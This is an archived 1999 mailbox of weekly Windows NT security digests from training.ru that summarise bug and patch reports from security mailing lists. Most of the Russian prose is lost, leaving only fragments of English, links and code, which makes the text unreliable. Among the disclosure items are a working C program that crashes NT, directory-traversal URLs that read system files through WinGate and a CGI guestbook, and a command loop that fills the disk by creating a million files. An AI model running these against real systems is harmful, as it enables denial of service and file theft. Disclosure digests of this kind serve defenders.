	for rudnyi@comp.chem.msu.su; Wed, 7 Apr 1999 10:18:14 +0400 (MSD)
Date: Wed, 7 Apr 1999 10:18:14 +0400 (MSD)
Message-Id: <199904070618.KAA06548@comp.chem.msu.su>
Subject: digest 26.3-1.4.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

26  - 1  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

1. Melissa Macro Virus

   Word,   
 .   ntbugtraq      
"Features versus Security versus User Education" ( , 
   ).   
 ,  ,      ,  
,      .

"Rob Slade, doting grandpa of Ryan and Trevor" <rslade@sprint.ca> (ntsecurity, 
wwa)       .

http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html

http://www.ciac.org/ciac/bulletins/j-037.shtml

ftp://ftp.complex.is/pub/macrdef2.zip

http://www.complex.is/f-prot/f-prot.html

http://chkpt.zdnet.com/chkpt/hud0007500a/www.zdnet.com/zdnn/stories/
news/0,4586,2233030,00.html

http://www.zdnet.com/zdnn/special/melissavirus.html

http://www.symantec.com/techsupp/mailissa.html 

http://www.antivirus.com/vinfo/security/sa032699.htm

http://www.avp.com/melissa/melissa.html

http://www.microsoft.com/security/bulletins/ms99-002.asp

http://www.sendmail.com/blockmelissa.html

ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html

http://www.innosoft.com/iii/pmdf/virus-word-emergency.html

http://www.sophos.com/downloads/ide/index.html#melissa 

http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp

http://www.pcworld.com/cgi-bin/pcwtoday?ID=10302

http://www.internetnews.com/bus-news/article/0,1087,3_89011,00.html

http://cnn.com/TECH/computing/9903/29/melissa.copycat.idg/

http://www.pcworld.com/cgi-bin/pcwtoday?ID=10308

2.   "  "

Andrew van der Stock <A.vanderStock@INFRASECURE.COM.AU> (ntbugtraq) 
,           
  Windows NT (Workstation  Server):

* 4.0 SP3 (ie3)
* 4.0 SP4 (ie3)
* 4.0 SP3 (ie4 [with and without Active Desktop])
* 4.0 SP4 (ie4 [with and without Active Desktop])
* 4.0 SP4 (ie4sp1 & y2k fix [with and without Active Desktop])

      100%.

The JACK <thejack@POBOX.COM> ,      
  WTS SP3/Metaframe 1.0 system. 
Colby_Burkett@AVERYDENNISON.COM ,     
  Windows NT Terminal Edition.

3.  "  "

Jussi Lahdenniemi <jl@VVF.FI> (ntbugtraq) ,   
   NT    
.

#define WIN32_LEAN_AND_MEAN
#define STRICT
#include <windows.h>

void main( void )
{
    char me[MAX_PATH], tpath[MAX_PATH], tname[MAX_PATH];
    HANDLE h;
    DWORD x, foo;
    STARTUPINFO sui;
    PROCESS_INFORMATION pi;

    if( MessageBox( NULL, "Do you want to crash your NT?", "Crash it?",
        MB_ICONQUESTION | MB_YESNOCANCEL ) != IDYES )
    {
        return;
    }

    GetModuleFileName( NULL, me, 256 );
    GetTempPath( 256, tpath );
    GetTempFileName( tpath, "foo", 0, tname );

    CopyFile( me, tname, FALSE );
    h = CreateFile( tname, GENERIC_READ | GENERIC_WRITE, 0,
        NULL, OPEN_EXISTING, 0, NULL );
    SetFilePointer( h, 0x3c, NULL, FILE_BEGIN );
    ReadFile( h, (void*)&x, sizeof( DWORD ), &foo, NULL );
    SetFilePointer( h, x + 0xc8, NULL, FILE_BEGIN );
    x = 0xba6defdd;
    WriteFile( h, (void*)&x, sizeof( DWORD ), &foo, NULL );
    WriteFile( h, (void*)&x, sizeof( DWORD ), &foo, NULL );
    CloseHandle( h );

    GetStartupInfo( &sui );
    CreateProcess( NULL, tname, NULL, NULL, FALSE, 0, NULL,
        NULL, &sui, &pi );
}

4. IE5      
 

Georgi Guninski <joro@NAT.BG> (ntbugtraq) ,   IE5  
,     JavaScript,   
         
.        
DHTML.    

http://www.nat.bg/~joro/fr.html

"Stephen Purpura (MSFDC-JV)" <v-spurpu@MICROSOFT.COM> ,  
    

Tools menu --> Internet options --> security tab --> custom level --> allow
paste operations via script = prompt or disable

    .

5.  IIS4 Specially-Malformed Get 
Request

Larry Budd <larry@ISERV.NET> (ntbugtraq)     
  "IS4 Specially-Malformed Get Request",   
 Q192296.    Windows NT 4.0 (w/sp1), Windows 
NT 4.0 Service Pack 3, Internet Explorer 4.01 SP1, Windows NT Option Pack 
4, Windows NT 4.0 Service Pack 4,  Microsoft Data Access Components 2.0 
  InfGET4i.exe Windows NT   
     (shut down).

    ,    Q187506, 
     "  " -  
Inetinfo.exe     asp-.

    ,    EVERYONE, 
AUTHENTICATED USERS, USERS,  IUSER_<ServerName>   
RWXD/RWD   WINNT.

6.     IE5

Frank Knobbe <FKnobbe@HOME.COM> (ntbugtraq)  . 
  Windows Explorer     ftp-  
 'Login As'      ,    
         
  FTP://username:password@server/dir (   
).

7.    Excel  
 

rotaiv <rotaiv@USA.NET> (ntsecurity, cooper)   , 
  Excel      , 
   

"Tools - Options - General" - "Macro Virus Protection".

1)    ,  Excel    
,   ,     
 .

2)     XLSTART   ,  
     (.  
Q180614).

     Virus Protection 
   (.  Q169811).

[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft
Excel]

 virus protection:
   "Options6"=3Ddword:00000008

 virus protection:
   "Options6"=3Ddword:00000000

8. Outlook Web Access

"Andrew Kunz" <kunza@tdbank.ca> (ntsecurity, iss)   
,   OWA      .

XADM: OWA Needs Anonymous and Clear Text Authentication on IIS 
(Q175891)
http://support.microsoft.com/support/kb/articles/q175/8/91.asp
XWEB: Permissions Required for Outlook Web Access (Q175892)
http://support.microsoft.com/support/kb/articles/q175/8/92.asp
XWEB: VBScript Error '800a03e3' When Accessing OWA Server 5.5 
(Q176245)
http://support.microsoft.com/support/kb/articles/q176/2/45.asp

*********************************************
   Sunbelt (http://www.sunbelt-software.com)

Giga Group  Sunbelt Software     
 NT.  1339  (    50000 
)   12%    BSOD (Blue Screen of Death) 
      .       
    20% . 61%   
 6   BSOD, 47 %    6   
 .     .  39 % 
 ,   NT    , 56% 
          4% 
     50% .

     

http://www.sunbelt-software.com/ntrelres3.htm



  Service Pack 5 for Windows NT.

     Windows 2000  
   X.500.     X.500 
  

http://www.salford.ac.uk/its024/X500.htm



From rudnyi Wed Apr 14 10:16:25 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id KAA14107
	for rudnyi@comp.chem.msu.su; Wed, 14 Apr 1999 10:16:24 +0400 (MSD)
Date: Wed, 14 Apr 1999 10:16:24 +0400 (MSD)
Message-Id: <199904140616.KAA14107@comp.chem.msu.su>
Subject: digest 2-8.4.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

2 - 8  1999 

   Training.ru
***************************************
  Training.ru      
SYMANTEC      
    Norton Antivirus   
     . 
 Norton Antivirus      
        
 ,     , 
     .   
      
   .

       (8  )  
   Training.ru   ,  , . 
1.   - 150 . .   - 17 .

    info@training.ru ,   (095) 112-2333 
  (095) 115-6001.     ,  
  ,      .
***************************************

  Training.ru      
        
,       
 . .

     11   
       
 . .. ( - , 
,  , , )  
    .    
 .

   1    8    
         
  .     
     1990-1999 .

   - - 1999 .

      
   .

      , 
  ,    .

      
   ,   
     .

       
http://training.ru/chem/.   . (095)939-2666    
 chem@training.ru.

***************************************

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

1. SP4  NT4 Terminal Server

Aaron Wood <awood@CS.WASHINGTON.EDU> (ntbugtraq)   
 SP4  NT4 Terminal Edition.

http://www.microsoft.com/ntserver/terminalserver/downloads/
recommended/TSESP4/default.asp

2.    

chefren <chefren@PI.NET> (ntbugtraq) ,     
          
 . ,     27  23:34   
      28  00:35.  
      ,   
  ,        
.

Julie Citro <jcitro@MHS.OKLAOSF.STATE.OK.US> (ntbugtraq)   
 .

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,    
 (   James Strompolis).

http://support.microsoft.com/support/kb/articles/q129/5/74.asp

.    NT  GMT.     
    - 1)   GMT  2)   
"Automatically adjust for Daylight Savings changes".  ,   
     ,   ,  
    .

   ,     "Automatically 
adjust for Daylight Savings changes".   -  , 
  ,   GMT.

3.   TIMEDATE.CPL  NT4SP4

joj@BI.IS (ntbugtraq) ,    SP4   
Monrovia/Casablanca    GMT    
"Automatically adjust the clock...".  -    
 .

4.  LookupAccountName  
  SID

Frank Heyne <fh@RCS.URZ.TU-DRESDEN.DE>, http://rcswww.urz.tu-
dresden.de/~fh/ (ntbugtraq) ,   LookupAccountName 
   SID.     
    (well-known) SID,    
   NT. ,    
   ,       
.      
LookupAccountName,     SID ,   
  SID.

5.    IE5

Georgi Guninski <joro@NAT.BG> (ntbugtraq) ,    
 "Microsoft Scriptlet Component"  URL  
'%01someURL',     ,   
    someURL.     
,     

http://www.nat.bg/~joro/scriptlet.html
http://www.nat.bg/~joro/scrspoof.html

 -   Javascript.

6.     
 

Pete Manley <petermanley@PNSL.CO.UK> (ntsecurity, cooper)  
  VBScript (   WSH  ADSI 2.5)  
   .

' -----------------------------------------------------
' Rename the Administrator Account and set the password
' -----------------------------------------------------

dim szNewName, oDomain, oUser

Set oDomain = GetObject("WinNT://domain/workstation")
Set oUser = oDomain.GetObject("user", "Administrator")

oUser.SetPassword "newpassword"
oUser.SetInfo()

Set szNewName = oDomain.MoveHere(oUser.ADsPath, "NEWADMIN")

Set oUser = Nothing
Set oDomain = Nothing

' -----------------------------------------------------

7. favicon.ico & MSIE 5.0

Ken Williams <jkwilli2@UNITY.NCSU.EDU> (ntbugtraq)   
  IE5.    -  
 "list of favorites",  IE5    favicon.ico   
 -.    ,   
      httpd error_log  .  - 
     .

8. Outlook Web Access   

JEK <jkolde@EARTHLINK.NET> (ntsecurity, cooper)   Exchange 
Server 5.5  IIS 3.0 (  WWW)  NT Server 4.0 SP3 ( SP4). 
  Outlook Web Access     
   -. ,    
  

Key:  HKLM\System\CurrentControlSet\Services\EventLog\Application
RestrictGuestAccess,  REG_DWORD,  1,    
 Outlook Web Access       
 .

         
 ,     Outlook Web Access  
.

9.     
  

  ntsecurity (cooper)     
  .    
.

EvntSLog (http://www.adiscon.com/)

"dumpevt.exe" SomarSoft's

NT Syslog (www.sabernet.net)

"Intruder Alert 3.0" (http://www.axent.com)

10.   WinGate

Marc <Marc@EEYE.COM> (ntbugtraq) (ntsecurity, iss)   , 
    WinGate (   
   http://www.eEye.com).

1)  

http://www.server.com:8010/c:/ - NT/Win9x
http://www.server.com:8010// - NT/Win9x
http://www.server.com:8010/..../ - Win9x

       .  
   ,    WinGate  
 127.0.0.1,      , ...

2)   "  "

 Winsock Redirector    2080.    
 ,  2000    ,    
WinGate .

3)  ,  WinGate  ,  .  
        .

11.     
 

"Wamsley, James R" <WamslJR@LOUISVILLE.STORTEK.COM> (ntbugtraq) 
,    McAfee   4.0.4017 
  NetBus Pro    Acrobat 4.0.  
,         
 4.0.4017.  4.0.4019  .   
         
http://ntbugtraq.ntadvice.com,  "NetBusPro in Adobe? You decide!".

Mnemonix <mnemonix@GLOBALNET.CO.UK>, http://www.arca.com, 
http://www.infowar.co.uk/mnemonix/ (ntbugtraq) ,   
Webcom's CGI Guestbook (www.webcom.se),   -
,        , 
,   

http://server/cgi-bin/wguest.exe?template=3Dc:\boot.ini
http://server/cgi-bin/rguest.exe?template=3Dc:\winnt\system32\$winnt$.inf

  .

"Saling, Kevin" <kevin.saling@VIVIDSEMI.COM> (ntbugtraq) ,  
 Norton AntiVirus for Internet Email Gateways 1.0.1.7 (NAVIEG)  
Norton AntiVirus for MS Exchange 1.5 (NAVMSE)     
   navieg.ini   
HKLM\Software\Symantec\NAVMSE\1.5\ModifyPassword . 



From rudnyi Tue Apr 20 10:28:50 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id KAA04458
	for rudnyi@comp.chem.msu.su; Tue, 20 Apr 1999 10:28:49 +0400 (MSD)
Date: Tue, 20 Apr 1999 10:28:49 +0400 (MSD)
Message-Id: <199904200628.KAA04458@comp.chem.msu.su>
Subject: digest 9-15.04.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

9 - 15  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

1. Poink

route@RESENTMENT.INFONEXUS.COM (ntbugtraq)    
,      Windows 9X/NT.

       .  
  ,   .

*  poink.c - NT/9x DOS attack
 *
 *  Code:
 *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
 *                         route|daemon9 <route@infonexus.com>
 *  All rights reserved.
 *
 *  Original Idea:
 *  Joel Jacobson (joel@mobila.cx)
 *
 *  This simple exploit was written as per the specification from Joel
 *  Jacobson's bugtraq post (http://geek-girl.com/bugtraq/1999_1/1299.html).
 *
 *  Needs libnet 0.99.
 *  Currently:  http://lazy.accessus.net/~route/libnet
 *  Soon:       http://www.packetfactory.net/
 *

aram@ADNC.COM (ntbugtraq) ,     
 MS PPTP    NT Workstation SP4.

2.   TIMEDATE.CPL

      .  
SP4         
. 

joj@BI.IS (ntbugtraq)      
   .     
     regedit   
 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
TimeZoneInformation]

     *.reg   .

3. INF4GET.EXE

Larry Budd <larry@ISERV.NET> (ntbugtraq)   ,   
  INF4GET (Specially-Malformed GET Request).  
, ,   ,     
     IIS 4.0   INF4GET.EXE,   Microsoft Data 
Access Components (MDAC) 2.0x.   INF4GET.EXE  
 MDAC,    .   MDAC  
  INF4GET,     .

4.  NetWare v. 4.10  NT 
  v. 4.0

Is Cas <IS_CAS@NOTES.UP.COM> (ntbugtraq)   
.

  NT    .    
  NT+NetWare   .  
     NetWare     
   NetWare  !!!

,     NetWare  .

5.   InfraGard

"Stout, Bill" <StoutB@PIONEER-STANDARD.COM> (ntbugtraq)   


http://www.informationweek.com/story/IWK19990416S0001

 ,     InfraGard   
   .

  : " Looks like we can all relax and go home 
now."

6.    

"Davis, Thomas R." <tdavis@indiana.edu> (ntsecurity, iss)  
       AllowedPaths   
HKLM\System\CurrentControlSet\Control\SecurePipeServers\winreg (. 
 http://support.microsoft.com//support/kb/articles/q153/1/83.asp).

         .  
 

	System\CurrentControlSet\Control\ProductOptions
	System\CurrentControlSet\Control\Print\Printers
	System\CurrentControlSet\Services\Eventlog
	Software\Microsoft\Windows NT\CurrentVersion
	System\CurrentControlSet\Services\Replicator

HKLM\System\CurrentControlSet\Control\Print\Printers

  KB Q153183 
http://support.microsoft.com/support/kb/articles/q153/1/83.asp , 
  Spooler       .   
,      ,     
.

HKLM\Software\Microsoft\Windows NT\CurrentVersion

      (auto-logon),   
        .  
    ,      .

HKLM\System\CurrentControlSet\Service\Replicator

  ,        
  ( Q168464 
http://support.microsoft.com/support/kb/articles/q168/4/64.asp)

   ,      
System\CurrentControlSet\Control\ProductOptions  
System\CurrentControlSet\Services\Eventlog.


******************************************
   Sunbelt (http://www.sunbelt-software.com)

 Beta 3 Windows 2000  21 ,  6  1999 
   Windows 2000.

 ,   MS SMS 2.0  NOVELL Z.E.N-
WORKS.

http://www.ncri.com/sms_vs_zen.html

 Novell   

http://www.novell.com/products/nds/zenworks/ms2.html

   PCWorld,   ,    W95  
W2000    $1700.

http://www.pcworld.com/pcwtoday/article/0,1510,10397,00.html

   WIRED Magazine's,   ,  Steve Ballmer 
      Linux.   , 
     ,    
  -      .

http://www.wired.com/news/news/email/explode-
infobeat/politics/story/19002.html

 W9x  NT    .   
 1999    Windows 98 Second Edition.

Stanford University        
.      http://google.com.

 Mindcraft     Linux.  
  Red Hat Linux 5.2 ( Linux 2.2.2)  Microsoft 
Windows NT Server 4.0

http://www.mindcraft.com/whitepapers/nts4rhlinux.html.

 NT    3.5    -   
2.5      .

    Dell PowerEdge 6300/400   
 400-MHz Xeon  1  .



From rudnyi Tue Apr 27 10:03:51 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id KAA15128
	for rudnyi@comp.chem.msu.su; Tue, 27 Apr 1999 10:03:50 +0400 (MSD)
Date: Tue, 27 Apr 1999 10:03:50 +0400 (MSD)
Message-Id: <199904270603.KAA15128@comp.chem.msu.su>
Subject: digest 16-22.04.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

16 - 22  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

1. PCAnywhere8    NTSP4

Howard W Wortley <hwortley@EMAIL.MSN.COM> (ntbugtraq) , 
    roll-up hotfix,   SP4, 
Symantec PCAnywhere  8    A  B 
     Ctrl-Alt-Del. Symantec 
       

http://service1.symantec.com/SUPPORT/pca.nsf/docid/1997101214333

2. NBTscan

Alla Bezroutchko <alla@sovlink.ru> (ntsecurity, iss)    
  NetBIOS.    

IP address       NetBIOS Name     Server    User             MAC address
- ------------------------------------------------------------------------------
192.168.1.2      MYCOMPUTER                 JDOE            
00-a0-c9-12-34-56
192.168.1.5      WIN98COMP        <server>  RROE            
00-a0-c9-78-90-00
192.168.1.123    DPTSERVER        <server>  ADMINISTRATOR   
08-00-09-12-34-56

     

http://www.abb.aha.ru/software/nbtscan.html

3.     
 NT

Luke Kenneth Casson Leighton <lkcl@SWITCHBOARD.NET>, 
http://www.cb1.com/~lkcl (ntbugtraq)   ,  
       NT.  
  .

   
----------------------------

- LM 16 byte cleartext-equivalent password hashes.

- NT 16 byte cleartext-equivalent password hashes.

- SMB NTLM 8-byte random challenge / 24-byte LM and NT response.

- DCE/RPC NETLOGON pipe "Interactive" and "Netlogon" credential chain
system.  Uses Trust Accounts (Workstation, Inter-Domain and Server).  NT
4.0 Service Pack 3 and below only.

  ,    
------------------------------------------

- DCE/RPC encryption (sign and seal) NTLMSSP version 1, 40-bit only.

- DCE/RPC SAM database password updates (SamrSetInformationUser).

- DCE/RPC lsarpc secret info (LsaQuerySecretInfo).

   
--------------------------------

- SMB NTLMv2 8-byte random challenge / NTLMv2 variable-length responses.
added to NT 4.0 Service Pack 4 but not NT 5.0 beta 3 :-)

- DCE/RPC encryption (sign and seal) NTLMSSP version 1, 128-bit and
"session key negotiation".

- DCE/RPC encryption (sign and seal) NTLMSSP version 2.  added to NT 4.0
Service Pack 4 and above.

- DCE/RPC NETLOGON "Secured Channel".  added to NT 4.0 Service Pack 4 
and above.

- DCE/RPC PDC <-> BDC SAM database replication.

   .  -   
,        Luke K C Leighton 
<lkcl@iss.net>.

4.   Internet Explorer 5

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,   
 

http://www.microsoft.com/security/bulletins/ms99-011.asp

   IE5,   Juan Carlos Cuartango.  
 

http://www.microsoft.com/windows/ie/security/dhtml_edit.asp

 ,  ,  .

http://pages.whowhere.com/computers/cuartangojc/dhtmle1.html

 Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)     
 

http://www.microsoft.com/security/bulletins/ms99-012.asp

   MSHTML.dll  IE4  IE5.

   

http://www.microsoft.com/windows/ie/security/mshtml.asp

 ,     NT.

     Q226326

http://support.microsoft.com/support/kb/articles/q226/3/26.asp

5.  CIH

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,   , 
26 ,  CIH      .  
     .

http://www.antivirus.com/vinfo/alerts.htm



From rudnyi Mon May  3 17:46:08 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id RAA27356
	for rudnyi@comp.chem.msu.su; Mon, 3 May 1999 17:46:08 +0400 (MSD)
Date: Mon, 3 May 1999 17:46:08 +0400 (MSD)
Message-Id: <199905031346.RAA27356@comp.chem.msu.su>
Subject: digest 23-29.04.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

23 - 29  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

1.   MFT

Vladimir Dubrovin <vlad@SANDY.RU> (ntbugtraq)   , 
    NTFS-.     
 ,    ,     ,   
NTFS      ,   
   .

  ,     ( 
        
50-100 ).

     NTFS .

md temp
for /L %i in (1,1,1000000) do type nul >temp/file.%i.tmp

    ,   

del /Q temp\*.*
del /Q temp

  ,     . 

   ,       
  MFT (Master  File Table,    NTFS),   
 MFT    (.  "How NTFS Reserves 
Space for its Master File Table (MFT)" Q174619).

 ,   dir /a $MFT    
   .

    .

2.      
 IIS

Michael Howard <mikehow@MICROSOFT.COM> (ntbugtraq)   
 ,      Access 
Denied  IIS 4  IIS 5.

http://support.microsoft.com/support/kb/articles/Q229/6/94.asp

3.   

Mnemonix <mnemonix@GLOBALNET.CO.UK> (ntbugtraq),  
http://www.infowar.co.uk/mnemonix, http://www.arca.com/  , 
    .    
 ,   

HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList

    ,  SID   
,      
(, %systemroot%\profiles\acc_name  \\PDC\profiles\acc_).  
       
  ( Everybody  - SetValue).    
    ,    
     . 
        , 
 HKLM\Software\Microsoft\Windows NT\CurrentVersion   
  AllowedPath.      
  reg.exe  NT Resource Kit.

 -        

HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList

SYSTEM - Write, Everyone - Read.

Paul Leach <paulle@MICROSOFT.COM> (ntbugtraq) ,   
  .

http://www.microsoft.com/NTServer/security/exec/overview/
Secure_NTInstall.asp

,      

\Software\Microsoft\Windows NT\CurrentVersion\Profile List

(   Profile  List).

David LeBlanc <dleblanc@MICROSOFT.COM> (ntbugtraq) ,  
    .   ,    
   ,      NT. 
      www.trustedsystems.com.

4.       
  SP4

Michael Webb <mwebb@BINDVIEW.COM> (ntbugtraq)   
 .    Win32    
      
CONTAINER_INHERITANCE_ACE  OBJECT_INHERIT_ACE,   
    SP4 ,      ,  
  (you have what ever permissions where in the Access Mask). 
  ,           
   .      SP4 
   .

Seiichi Tatsukawa <stat@ATRIA.COM> (ntbugtraq) , ,   
,     INHERIT_ONLY_ACE.

Felix Kasza <felixk2@MVPS.ORG> (ntbugtraq) ,    
  NT4      API,     
 .      
 EXPLICIT_ACCESS,    API   
.

Aaron Wood <awood@CS.WASHINGTON.EDU> (ntbugtraq)   
  Q195509

http://support.microsoft.com/support/kb/articles/q195/5/09.asp

        
,    Security Configuration Manager (SCM).

5.     
HTML  IE4/5

Brooks Martin <MBrooks@TJGUK.COM> (ntbugtraq) ,   
 

<html>
<a href="/scripts/blah.pl?blah=1&sect=2">Blah</a><br>
&sect; &sect; &sect; &sect;
</html>

&sect     URI       
CGI,   ,  ,     .

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,     
  , , &amp, &#123  &name.

"Cruz, Miguel (OD/ORS)" <cruzm@ORS.OD.NIH.GOV> (ntbugtraq)  
   URI RFC (rfc1738)  RFC2068, section 3.2,   
,        
URI. ,    IE4  IE5.

Nick Jones <nick@ADVALUE.COM> (ntbugtraq) ,  Netscape 
Navigator 4.5  ,    IE.

, Philip Guenther <guenther@GAC.EDU> (ntbugtraq) ,  
    URI     
,    .

http://www.w3.org/TR/REC-html40/appendix/notes.html#non-ascii-chars

  B.2.2  ,    URI "http://host/?x=1&y=2" 
  <A href="http://host/?x=1&#38;y=2"> 
<A href="http://host/?x=1&amp;y=2">.

David J Woolley <djw@BTS.CO.UK> (ntbugtraq)  ,  
         
  .

6.  NetWare

Jim Rennell <jrennell@ENGIN.UMICH.EDU> (ntbugtraq)    
   Netware   .    SMS 
    Netware,       
    net use,     
 SMS.   net use     , 
    ,        
 Netware.    IntraNetware 4.6  NT 4.0 SP4. 
         
Netware,        
.   ,      
    ,      
.

7.  subst

Jim Rennell <jrennell@ENGIN.UMICH.EDU> (ntbugtraq)  
     subst.   
       
        
.  ,     

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session 
Manager]
"ProtectionMode"=dword:1

    KnownDLL,       
  ,  ,  .

8.     
 

Rick Vargo <rvargo@ISERV.NET> (ntbugtraq) ,   
 3.1.X McAfee Netshield NT   4.0.3a  
 kmode_exception_not_handled   rdr.sys.

**********************************************
   Sunbelt, http://www.sunbelt-software.com

   ,      
 .

http://www.sunbelt-software.com/qamsnod.htm

  MindCraft   NT  Linux.  
   ,  ,  , 
      Linux. 
      

http://www.mindcraft.com/whitepapers/nts4rhlinux.html
http://www.zdnet.com/zdnn/stories/news/0%2C4586%2C2242246%2C00.html
http://lwn.net/1999/features/MindCraft.phtml
http://slashdot.org/article.pl?sid=99/04/14/0042212

28   beta 3 Windows 2000.

http://www.microsoft.com/windows/preview/order.asp

 ,    NT.

Mark Edmead, Paul Hinsberg "Windows NT Performance: Monitoring, 
Benchmarking and Tuning". New Riders, ISBN 1-56205-942-4. $29.99 USA, 
250 .

    SPQuery     
 .

http://www.sunbelt-software.com/spquery.htm

       Y2K

http://www.cnn.com/TRAVEL/NEWS/9904/11/faa.y2k/



From rudnyi Sat May  8 11:20:34 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id LAA20778
	for rudnyi@comp.chem.msu.su; Sat, 8 May 1999 11:20:33 +0400 (MSD)
Date: Sat, 8 May 1999 11:20:33 +0400 (MSD)
Message-Id: <199905080720.LAA20778@comp.chem.msu.su>
Subject: digest 30.04-6.05.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: O

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

30  - 6  1999 

:       .

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

1.  Service Pack 5  NT 4.0

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,   SP5

http://www.microsoft.com/ntserver/nts/news/msnw/Sp5Mktbulletin.asp

2. Bastion Host  NT

Stefan Norberg <stnor@SWEDEN.HP.COM> (ntbugtraq)   
"Building a Windows NT bastion host in practice"

http://people.hp.se/stnor

3. NET USE     
 16 

"Greg T. Taylor" <Greg.Taylor@NAU.EDU> (ntbugtraq) ,   SP5 
  ,    16- 
     NET USE.  
   Q221150.

http://support.microsoft.com/support/kb/articles/q221/1/50.asp

4.  SP5   IP Source-routing

David LeBlanc <dleblanc@MICROSOFT.COM> (ntbugtraq) ,   
SP5  IP Source-routing.     Q217336

http://support.microsoft.com/support/kb/articles/q217/3/36.asp.

      DisableIPSourceRouting 
( REG_DWORD)  1.    

HKLM\System\CurrentControlSet\Services\Tcpip\Parameters

5. IIS    

Fredrik <Fredrik.Bjork.List@VARBERGENERGI.SE> (ntbugtraq) , 
 IIS          
(, www.foo.com.). www.foo.com.     
(fully qualified domain name)   www.foo.com

      IIS 4.0 (NT 4.0 SP3), 
, www.foo.com  www.foobar.com,   
www.foobar.com. (  )      
(default web).

:      (www.foobar.com  
www.foobar.com.)

6. GaLaDRieL:   Corel Draw

Bernardo Quintero <bernardo@HISPASEC.COM> (ntbugtraq)   
 -  Corel Draw.

http://www.hispasec.com/galadriel.asp

7. NTFSDOS  SP4

MegaSurge <megasurg@teleport.com> (ntsecurity, iss) ,   
 SP4     NTFSDOS. 
   NTFS,      . 
    linux ( 2.2.x)     NTFS.

8.   IE5

Mark <mark@NTSHOP.NET> (ntbugtraq)  .  
  ftp  IE5      TypedURLs.  
 IE5   ,       
(    "Address")    IE5   
 ftp-,   .    
        .

  - I wish I'd stuck with IE 4.x - doh.

9. IE5    ,   
Netscape

"LA MOTTA, DAVID" <DLAMOTT@ENTERGY.COM> (ntbugtraq) 
,  ,      Netscape Communicator 
(http://www.nat.bg/~joro/ncache.html --  "Click here for a 
demonstration..."),     IE5,   
   100%.

10.    NAI AntiVirus

Simple Nomad <thegnome@NMRC.ORG>, www.nmrc.org (ntbugtraq) 
 ,    Network Associates 
VirusScan NT ( McAfee VirusScan NT).

VirusScan NT 4.0.2        
  (scan.dat),   ,    
.

   

Microsoft NT Server 4.0 w/SP3, Network Associates VirusScan NT version
4.0.2.

Microsoft NT Workstation 4.0 w/SP3 and SP4, Network Associates VirusScan
NT version 4.0.2.

 -     4.0.3a.

11.     
 

Arne Vidstrom <winnt@BAHNHOF.SE> (ntbugtraq) ,  FTP Serv-
U 2.5   ,    . 
 ,      155 . 
Rob Beckers <Rob@CAT-SOFT.COM>      
   ftp://ftp.cat-soft.com/beta/.



From rudnyi Wed May 26 14:15:28 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id OAA29028
	for rudnyi@comp.chem.msu.su; Wed, 26 May 1999 14:15:27 +0400 (MSD)
Date: Wed, 26 May 1999 14:15:27 +0400 (MSD)
Message-Id: <199905261015.OAA29028@comp.chem.msu.su>
Subject: digest 7-20.05.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

7 - 20  1999 

 .

From: Ryvkin Serge <ryvkin@saybolt.ru>
Subject: IE 5.0 error
Date: Wed, 12 May 1999 12:43:03 +0400

